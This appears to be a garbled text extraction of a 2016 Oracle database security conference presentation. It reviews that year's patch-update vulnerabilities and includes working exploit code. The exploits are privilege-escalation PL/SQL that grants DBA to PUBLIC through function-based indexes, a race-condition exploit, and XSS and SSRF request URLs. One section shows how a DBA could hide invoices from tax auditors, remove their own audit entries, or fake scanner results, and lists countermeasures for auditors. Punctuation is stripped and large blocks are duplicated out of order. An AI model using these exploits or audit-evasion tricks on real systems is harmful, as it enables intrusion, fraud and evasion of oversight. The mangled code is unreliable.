Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
